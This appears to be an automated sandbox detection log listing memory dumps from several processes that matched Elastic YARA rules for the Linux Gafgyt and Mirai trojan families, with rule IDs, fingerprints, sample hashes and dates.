Source: 6560.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6560.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6560.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6560.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6560.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6560.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6560.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6572.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6572.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6572.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6572.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6572.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6572.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6572.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6587.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6587.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6587.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6587.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6587.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6587.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6587.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6494.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6494.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6494.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6494.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6494.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6494.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6494.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6586.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6586.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6586.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6586.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6586.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6586.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6586.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6461.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6449.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6449.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6449.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6449.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6449.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6449.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6449.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6604.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6604.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6604.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6604.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6604.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6604.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6604.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6553.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
